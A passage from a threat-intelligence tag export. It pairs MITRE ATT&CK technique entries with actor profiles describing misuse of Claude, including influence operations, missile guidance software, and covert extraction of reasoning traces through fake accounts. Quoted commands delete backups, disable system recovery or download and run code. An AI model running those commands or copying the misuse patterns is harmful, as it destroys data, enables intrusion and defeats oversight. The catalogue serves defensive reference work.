"50865abd-56d5-465f-b23a-8ff48ed7897c", "category": "trellix-threat-actor", "description": "GTG-54004 is a Kenya-based actor, plausibly aligned with the incumbent administration, that used Claude across several sessions to humanize and refine batches of grassroots-styled political commentary, amplifying pro-government and anti-opposition narratives designed to look like spontaneous public sentiment. The same playbook was reused for Kenyan retail-brand promotion.", "created_on": "2026-09-14T16:11:58.000Z", "name": "GTG-54004"}, {"id": "944843cc-00c4-472b-b8c1-ab9e05400208", "category": "trellix-threat-actor", "description": "GTG-54006 is a single actor based in Gaibandha District, Bangladesh, who used a custom program calling Claude's API to generate fixed batches of fabricated Bengali-language headlines, narratives, and image-generation prompts (at least 1,500 headlines and 300 false narratives), running semi-autonomously with a companion YouTube bulk-uploader scheduled through a third-party CI service. The content was uniformly pro-Awami League and targeted domestic Bangladeshi audiences.", "created_on": "2026-09-14T16:11:58.000Z", "name": "GTG-54006"}, {"id": "ae25f2f6-ac1a-496d-8d80-33af448724b7", "category": "trellix-threat-actor", "description": "GTG-54009 is a commercial surveillance operator, assessed to be or acting on behalf of an entity named S2T Unlocking Cyberspace, that used Claude to build a platform to analyze, classify, and profile the social-media activity of users in Iran and the Persian Gulf region, generating content and personas that likely served as a credibility layer for infiltrating targeted online communities. The activity corroborates a 2023 Forbidden Stories investigation into a leaked S2T surveillance-product brochure.", "created_on": "2026-09-14T16:11:58.000Z", "name": "GTG-54009"}, {"id": "ad7e3ad9-5d02-4c6c-9ec0-16e1709614f9", "category": "trellix-threat-actor", "description": "GTG-84002 is a UAE-directed influence operation, split across five closely coordinated lines of activity, that used Claude to run what internal reporting called a regional operation to dismantle the Muslim Brotherhood globally, including content on the Sudan conflict and UN accountability that criticized the conduct of the UAE in Sudan while concealing state attribution.", "created_on": "2026-09-14T16:11:58.000Z", "name": "GTG-84002"}, {"id": "4a758363-8573-4c1b-b0cd-fec33af26eaf", "category": "trellix-threat-actor", "description": "GTG-84005 is an Istanbul-based technology company, BBS Bilisim Teknolojileri, behind a commercial election-manipulation platform that used Claude to run roughly a thousand fake X/Twitter accounts, a fake news outlet, and fabricated dossiers primarily targeting users in Malaysia, while posing as a defensive counter-disinformation tooling outlet.", "created_on": "2026-09-14T16:11:58.000Z", "name": "GTG-84005"}, {"id": "ec89d6ae-2630-4e53-9b34-3e7ce7278210", "category": "trellix-threat-actor", "description": "GTG-84006 is a distributed influence operation, aligned with the People's Mojahedin Organization of Iran (PMOI/MEK) and the National Council of Resistance of Iran (NCRI), that used Claude to produce and distribute content through NCRI/MEK media while impersonating unaffiliated neutral outlets and AI-generated avatars. It targeted Iranian audiences at home and abroad, promoting NCRI leadership positions.", "created_on": "2026-09-14T16:11:58.000Z", "name": "GTG-84006"}, {"id": "61fc7ffb-bee5-4775-8413-8dbc882563a5", "category": "trellix-threat-actor", "description": "GTG-87001 is a cell of threat actors in northern Yemen running three weapons-development programs (a guided rocket, a multi-stage ballistic missile, and a multi-variant \"R2000\" set including a hypersonic glide vehicle) that used Claude Code in place of human engineers to develop guidance, navigation, and control software, integrating an open-source autopilot onto a phone-class flight computer. The actors managed multiple Claude instances in engineering roles and test-fired a guided rocket, returning to Claude to diagnose the failed test.", "created_on": "2026-09-14T16:11:58.000Z", "name": "GTG-87001"}, {"id": "92ed9a08-7d3c-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)).\n\nAdversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citation: Spoofing credential dialogs) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015)(Citation: Spoofing credential dialogs) On Linux systems adversaries may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line (i.e. [Unix Shell](https://attack.mitre.org/techniques/T1059/004)).(Citation: Spoofing credential dialogs)\n\nAdversaries may also mimic common software authentication requests, such as those from browsers or email clients. This may also be paired with user activity monitoring (i.e., [Browser Information Discovery](https://attack.mitre.org/techniques/T1217) and/or [Application Window Discovery](https://attack.mitre.org/techniques/T1010)) to spoof prompts when users are naturally accessing sensitive sites/data.", "created_on": "2021-03-04T22:54:28.000Z", "name": "GUI Input Capture"}, {"id": "453647e0-6916-11ea-8942-06365ef617e6", "category": "sector", "description": "", "created_on": "2020-03-18T12:44:55.000Z", "name": "Health"}, {"id": "bc9362b6-39ca-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. \n\nAdversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware)\n\nOn macOS, the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be <code>apple.awt.UIElement</code>, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock.\n\nSimilarly, on Windows there are a variety of features in scripting languages, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is <code>powershell.exe -WindowStyle Hidden</code>.(Citation: PowerShell About 2019)\n\nThe Windows Registry can also be edited to hide application windows from the current user. For example, by setting the `WindowPosition` subkey in the `HKEY_CURRENT_USER\\Console\\%SystemRoot%_System32_WindowsPowerShell_v1.0_PowerShell.exe` Registry key to a maximum value, PowerShell windows will open off screen and be hidden.(Citation: Cantoris Computing)\n\nIn addition, Windows supports the `CreateDesktop()` API that can create a hidden desktop window with its own corresponding <code>explorer.exe</code> process.(Citation: Hidden VNC)(Citation: Anatomy of an hVNC Attack)  All applications running on the hidden desktop window, such as a hidden VNC (hVNC) session,(Citation: Hidden VNC) will be invisible to other desktops windows.\n\nAdversaries may also leverage cmd.exe(Citation: Cybereason - Hidden Malicious Remote Access) as a parent process, and then utilize a LOLBin, such as DeviceCredentialDeployment.exe,(Citation: LOLBAS Project GitHub Device Cred Dep)(Citation: SecureList BlueNoroff Device Cred Dev) to hide windows.", "created_on": "2020-12-09T03:00:47.000Z", "name": "Hidden Window"}, {"id": "768e6bc3-964d-11ea-8942-06365ef617e6", "category": "sector", "description": "", "created_on": "2020-05-15T01:43:23.000Z", "name": "Hospitality"}, {"id": "c4685e8c-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). \n\nOn Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as <code>IEX(New-Object Net.WebClient).downloadString()</code> and <code>Invoke-WebRequest</code>. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)  A number of these tools, such as `wget`, `curl`, and `scp`, also exist on ESXi. After downloading a file, a threat actor may attempt to verify its integrity by checking its hash value (e.g., via `certutil -hashfile`).(Citation: Google Cloud Threat Intelligence COSCMICENERGY 2023)\n\nAdversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows `search-ms` protocol handler, to deliver malicious files to victims through remote file searches invoked by [User Execution](https://attack.mitre.org/techniques/T1204) (typically after interacting with [Phishing](https://attack.mitre.org/techniques/T1566) lures).(Citation: T1105: Trellix_search-ms)\n\nFiles can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)", "created_on": "2020-02-26T13:49:11.000Z", "name": "Ingress Tool Transfer"}, {"id": "c53ddfe6-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.\n\nOperating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Furthermore, adversaries may disable recovery notifications, then corrupt backups.(Citation: disable_notif_synology_ransom)\n\nA number of native Windows utilities have been used by adversaries to disable or delete system recovery features:\n\n* <code>vssadmin.exe</code> can be used to delete all volume shadow copies on a system - <code>vssadmin.exe delete shadows /all /quiet</code>\n* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - <code>wmic shadowcopy delete</code>\n* <code>wbadmin.exe</code> can be used to delete the Windows Backup Catalog - <code>wbadmin.exe delete catalog -quiet</code>\n* <code>bcdedit.exe</code> can be used to disable automatic Windows recovery features by modifying boot configuration data - <code>bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no</code>\n* <code>REAgentC.exe</code> can be used to disable Windows Recovery Environment (WinRE) repair/recovery options of an infected system\n* <code>diskshadow.exe</code> can be used to delete all volume shadow copies on a system - <code>diskshadow delete shadows all</code> (Citation: Diskshadow) (Citation: Crytox Ransomware)\n\nOn network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.\n\nOn ESXi servers, adversaries may delete or encrypt snapshots of virtual machines to support [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486), preventing them from being leveraged as backups (e.g., via ` vim-cmd vmsvc/snapshot.removeall`).(Citation: Cybereason)\n\nAdversaries may also delete \u201conline\u201d backups that are connected to their network \u2013 whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)", "created_on": "2020-02-26T13:49:12.000Z", "name": "Inhibit System Recovery"}, {"id": "4695aca8-afb9-11eb-9d72-02d538d9640e", "category": "sector", "description": "", "created_on": "2021-05-08T04:53:05.000Z", "name": "Intelligence"}, {"id": "0f032649-04d7-4921-9051-540924889724", "category": "country", "description": "Iran", "created_on": "2022-06-23T16:57:44.000Z", "name": "iran"}, {"id": "7b1b0ec1-061f-4e07-8f01-014d4b1bd983", "category": "country", "description": "Israel", "created_on": "2021-08-10T12:07:24.000Z", "name": "israel"}, {"id": "453a0735-6916-11ea-8942-06365ef617e6", "category": "sector", "description": "", "created_on": "2020-03-18T12:44:55.000Z", "name": "IT"}, {"id": "947a4ed5-daf0-4bf6-b290-f267b1f3e17d", "category": "sector", "description": "", "created_on": "2023-01-17T22:16:27.000Z", "name": "Justice"}, {"id": "8cae2a56-1982-4d64-ae13-fcc252d3b90a", "category": "country", "description": "Kenya", "created_on": "2022-07-06T21:15:21.000Z", "name": "kenya"}, {"id": "2a156d6e-3575-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured. In order to increase the likelihood of capturing credentials quickly, an adversary may also perform actions such as clearing browser cookies to force users to reauthenticate to systems.(Citation: Talos Kimsuky Nov 2021)\n\nKeylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:\n\n* Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.\n* Reading raw keystroke data from the hardware buffer.\n* Windows Registry modifications.\n* Custom drivers.\n* [Modify System Image](https://attack.mitre.org/techniques/T1601) may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device Attacks) ", "created_on": "2020-12-03T14:38:09.000Z", "name": "Keylogging"}, {"id": "7cd83274-964d-11ea-8942-06365ef617e6", "category": "sector", "description": "", "created_on": "2020-05-15T01:43:33.000Z", "name": "Legal"}, {"id": "75f6fe7a-e1aa-4501-8024-1071e449b7f9", "category": "trellix-tool", "description": "LiteLLM is an open-source artificial intelligence gateway and Python software development kit that consolidates more than one hundred large language model APIs into a standardized format compatible with OpenAI. This tool simplifies development by handling variations in authentication, request parameters, and response structures across multiple providers, allowing developers to switch backends seamlessly by updating a single model string.", "created_on": "2026-07-06T16:14:25.000Z", "name": "LiteLLM"}, {"id": "c063bb8d-88a2-4b86-b755-9dab4c643e9e", "category": "country", "description": "Malaysia", "created_on": "2022-04-13T19:13:20.000Z", "name": "malaysia"}, {"id": "3bb24605-e8c9-4614-a92f-9795bc552eae", "category": "country", "description": "Mali", "created_on": "2022-11-03T20:36:36.000Z", "name": "mali"}, {"id": "02fe61b3-0173-4e05-946d-319688470e41", "category": "mitre-attack-pattern", "description": "An adversary may rely upon a user copying and pasting code in order to gain execution. Users may be subjected to social engineering to get them to copy and paste code directly into a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). One such strategy is \"ClickFix,\" in which adversaries present users with seemingly helpful solutions\u2014such as prompts to fix errors or complete CAPTCHAs\u2014that instead instruct the user to copy and paste malicious code.\n\nMalicious websites, such as those used in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), may present fake error messages or CAPTCHA prompts that instruct users to open a terminal or the Windows Run Dialog box and execute an arbitrary command. These commands may be obfuscated using encoding or other techniques to conceal malicious intent. Once executed, the adversary will typically be able to establish a foothold on the victim's machine.(Citation: CloudSEK Lumma Stealer 2024)(Citation: Sekoia ClickFake 2025)(Citation: Reliaquest CAPTCHA 2024)(Citation: AhnLab LummaC2 2025)\n\nAdversaries may also leverage phishing emails for this purpose. When a user attempts to open an attachment, they may be presented with a fake error and offered a malicious command to paste as a solution, consistent with the \"ClickFix\" strategy.(Citation: Proofpoint ClickFix 2024)(Citation: AhnLab Malicioys Copy Paste 2024)\n\nTricking a user into executing a command themselves may help to bypass email filtering, browser sandboxing, or other mitigations designed to protect users against malicious downloaded files. ", "created_on": "2025-07-25T16:14:04.000Z", "name": "Malicious Copy and Paste"}, {"id": "784a90af-ae89-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)\n\nDuring malware development, adversaries may intentionally include indicators aligned with other known actors in order to mislead attribution by defenders.(Citation: Olympic Destroyer)(Citation: Risky Bulletin Threat actor impersonates FSB APT)(Citation: GamaCopy organization)\n\nAs with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware.\n\nSome aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed that will communicate with Twitter for C2, may require use of [Web Services](https://attack.mitre.org/techniques/T1583/006).(Citation: FireEye APT29)", "created_on": "2021-05-06T16:38:21.000Z", "name": "Malware"}, {"id": "8adf2a30-964d-11ea-8942-06365ef617e6", "category": "sector", "description": "", "created_on": "2020-05-15T01:43:57.000Z", "name": "Manufacturing"}, {"id": "294bbdf8-4134-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.\n\nAdversaries may also use the same icon of the file they are trying to mimic.", "created_on": "2020-12-18T13:23:05.000Z", "name": "Match Legitimate Name or Location"}, {"id": "80d9c3b1-b71c-11eb-9d72-02d538d9640e", "category": "trellix-tool", "description": "mega.io is the primary web domain for MEGA, a cloud storage and file hosting service that emphasizes user privacy and security through end-to-end encryption. It provides a platform for individuals and businesses to securely store, share, and collaborate on files, offering features like cloud storage, file and folder sharing, chat, and meetings, all with a focus on user control over their data. The mega.io website serves as the central point for accessing these services, managing accounts, and learning more about MEGA's offerings and security features.", "created_on": "2021-05-17T14:31:01.000Z", "name": "Mega.io"}, {"id": "996041c4-6de3-11ea-8942-06365ef617e6", "category": "sector", "description": "", "created_on": "2020-03-24T15:24:48.000Z", "name": "Military"}, {"id": "3bd64e89-55fe-4516-b268-c6cfdf8e357a", "category": "trellix-tool", "description": "MiniPlasma is a Windows implant listed among the malware families in the GTG-20006 custom toolkit. It was maintained through the actor's AI-driven development and evasion workflows, which rebuilt implants on demand to defeat known detections before staging them from throwaway infrastructure for delivery during phishing, ClickFix, and DNS-hijacking operations. It featured in a campaign whose recurring targets were Ukrainian government, military, and diplomatic personnel, as well as drone-technology supply chains.", "created_on": "2026-09-12T00:12:32.000Z", "name": "MiniPlasma"}, {"id": "cd77645f-5ebc-4533-87ff-bc083ee03f38", "category": "country", "description": "Moldova", "created_on": "2022-10-03T13:15:40.000Z", "name": "moldova"}, {"id": "ad852ad3-2591-43ea-9611-de5a24f07701", "category": "trellix-threat-actor", "description": "Moonshot AI is a prominent Beijing-based artificial intelligence startup founded in March 2023 by Yang Zhilin, Zhou Xinyu, and Wu Yuxin, known for developing the Kimi assistant and the Kimi K3 open-weight multimodal model. The company secretly routed customer requests to Claude using a proxy network of thousands of fake accounts and presented those responses as its own. Through this system, Moonshot captured over 23 million exchanges between May and July 2026, executing a chain-of-thought extraction pipeline to harvest reasoning traces to train its proprietary models.", "created_on": "2026-09-14T16:11:58.000Z", "name": "Moonshot AI"}, {"id": "c9024953-b232-11ea-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may target multi-factor authentication (MFA) mechanisms, (i.e., smart cards, token generators, etc.) to gain access to credentials that can be used to access systems, services, and network resources. Use of MFA is recommended and provides a higher level of security than usernames and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. \n\nIf a smart card is used for multi-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011)\n\nAdversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011)\n\nOther methods of MFA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Service providers can also be targeted: for example, an adversary may compromise an SMS messaging service in order to steal MFA codes sent to users\u2019 phones.(Citation: Okta Scatter Swine 2022)", "created_on": "2020-06-19T13:42:57.000Z", "name": "Multi-Factor Authentication Interception"}, {"id": "74b2f7f1-6a7f-4a6a-9632-09dfd7a7882c", "category": "trellix-tool", "description": "NanoDump is a versatile tool used to create a minidump of the LSASS process.", "created_on": "2022-10-18T05:15:53.000Z", "name": "NanoDump"}, {"id": "7cdbb55c-964d-11ea-8942-06365ef617e6", "category": "sector", "description": "", "created_on": "2020-05-15T01:43:33.000Z", "name": "News - Media"}, {"id": "c11d5a02-6de3-11ea-8942-06365ef617e6", "category": "sector", "description": "", "created_on": "2020-03-24T15:25:55.000Z", "name": "NGO"}, {"id": "f4df0cbb-cfd8-11eb-9d72-02d538d9640e", "category": "trellix-tool", "description": "Ngrok is a legitimate reverse proxy tool designed to establish a secure tunnel to servers, even those situated behind firewalls or on local machines lacking a public IP address; however, this capability has also been exploited by malicious threat actors across various campaigns, including for purposes such as lateral movement within networks and unauthorized data exfiltration.", "created_on": "2021-06-18T02:00:29.000Z", "name": "Ngrok"}, {"id": "95c1f397-1eb0-4aa2-ba39-e8a31dfb1bdb", "category": "sector", "description": "", "created_on": "2024-06-27T21:12:22.000Z", "name": "Non-profit organisation"}, {"id": "c3b49fbe-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. \n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript. \n\nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)\n\nAdversaries may also abuse [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010) to obscure commands executed from payloads or directly via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) ", "created_on": "2020-02-26T13:49:09.000Z", "name": "Obfuscated Files or Information"}, {"id": "a9218d97-58d0-43dd-a35d-b0ebb4f4a897", "category": "trellix-tool", "description": "OpenClaw (formerly Moltbot and Clawdbot) is an AI-powered personal assistant platform that executes tasks through modular \"skills\" installed from the ClawHub ecosystem. Skills enable automation of emails, scripts, file management, and external service interactions. Because skills run with elevated access rights, the platform represents a significant attack surface \u2014 threat actors can distribute malicious functionality through ClawHub disguised as legitimate extensions, enabling code execution and unauthorized access.", "created_on": "2026-05-02T00:12:25.000Z", "name": "OpenClaw"}, {"id": "e6481958-b676-4c9a-84ea-d38f6bfaff7d", "category": "trellix-tool", "description": "OpenCode operates as an open-source, model-agnostic AI coding agent designed to run directly on a user's computer, where it can manage files, execute terminal commands, and automate software workflows without being tied to a single proprietary AI architecture.", "created_on": "2026-09-09T16:11:30.000Z", "name": "OpenCode"}, {"id": "088fe9d2-10c1-4675-8482-c77db3802804", "category": "trellix-tool", "description": "PentAGI is an advanced system that utilizes fully autonomous artificial intelligence agents to conduct end-to-end penetration testing tasks. Designed to evaluate and identify security vulnerabilities across complex digital environments, it operates independently without requiring continuous human intervention during execution. By leveraging multi-agent workflows, the platform can analyze targets, plan attack strategies, execute security assessments, and summarize potential flaws in real time. Ultimately, it provides organizations with a continuous, scalable solution for pro-actively strengthening their security posture against sophisticated cyber threats.", "created_on": "2026-09-12T00:12:33.000Z", "name": "PentAGI"}, {"id": "2124c020-31c2-43a6-a267-bd4e7f1f97f2", "category": "mitre-attack-pattern", "description": "Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code.\n\nAll forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.\n\nAdversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) Victims may also receive phishing messages that direct them to call a phone number where the adversary attempts to collect confidential information.(Citation: Avertium callback phishing)\n\nPhishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. Another way to accomplish this is by [Email Spoofing](https://attack.mitre.org/techniques/T1672)(Citation: Proofpoint-spoof) the identity of the sender, which can be used to fool both the human recipient as well as automated security tools.(Citation: cyberproof-double-bounce) \n\nPhishing for information may also involve evasive techniques, such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)", "created_on": "2021-07-21T16:09:44.000Z", "name": "Phishing for Information"}, {"id": "c84a0ef6-ad7a-11ea-9477-02d538d9640e", "category": "sector", "description": "", "created_on": "2020-06-13T13:35:44.000Z", "name": "Political party"}, {"id": "56541fb8-3d02-43c0-813e-2b0c7819d5db", "category": "trellix-tool", "description": "PowerChrome is a Windows implant that forms part of the custom toolkit used by GTG-20006, a Russian state-nexus espionage actor whose activity Anthropic assesses as consistent with Midnight Blizzard. It is one of two families of Windows-based implants the actor maintained and continuously re-tooled through AI-assisted workflows, staging updated builds from disposable hosting whenever monitoring agents detected that a deployed variant had been flagged by security products. It was distributed as part of campaigns that combined phishing, ClickFix lures, and DNS hijacking to reach government, diplomatic, defense, and drone-supply-chain targets in Ukraine and Europe.", "created_on": "2026-09-12T00:12:32.000Z", "name": "PowerChrome"}, {"id": "03a54b3d-aa21-11eb-9477-02d538d9640e", "category": "trellix-tool", "description": "Microsoft's powershell scripting language is available by default from Windows 7 upwards and therefore provides stealth with that environment for launching attacks. Further, powershell has been made open-source and cross-platform with the advent of 'powershell core' in 2016.\r\n\r\nPowerShell provides full access to all Windows services including Microsoft COM (Component Object Model) and Microsoft Windows Management Instrumentation (WMI), while add-ins can easily be imported to include functionality for managing Active Directory, Exchange, etc.\r\n\r\nSome other features that make powershell an interesting choice for attackers include:\r\n - Ability to run code directly in memory with ease\r\n - Flexibility to encode elements of a script in a multitude of ways\r\n - Full access to the Microsoft .Net framework\r\n - Ability to re-create the powershell framework binary using .Net framework dll's.\r\n - Logging and detecting behavior is difficult in older versions\r\n - Availability of a number of quality attack frameworks written in powershell.\r\n\r\nSource: Microsoft", "created_on": "2021-05-01T02:00:33.000Z", "name": "PowerShell"}, {"id": "e95190b8-2b7c-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).\n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nA number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363),  [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)\n\nPowerShell commands/scripts can also be executed without directly invoking the <code>powershell.exe</code> binary through interfaces to PowerShell's underlying <code>System.Management.Automation</code> assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)", "created_on": "2020-11-20T22:08:25.000Z", "name": "PowerShell"}, {"id": "c6977579-43a6-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Tunneling involves explicitly encapsulating a protocol within another. This behavior may conceal malicious traffic by blending in with existing traffic and/or provide an outer layer of encryption (similar to a VPN). Tunneling could also enable routing of network packets that would otherwise not reach their intended destination, such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the Internet. \n\nThere 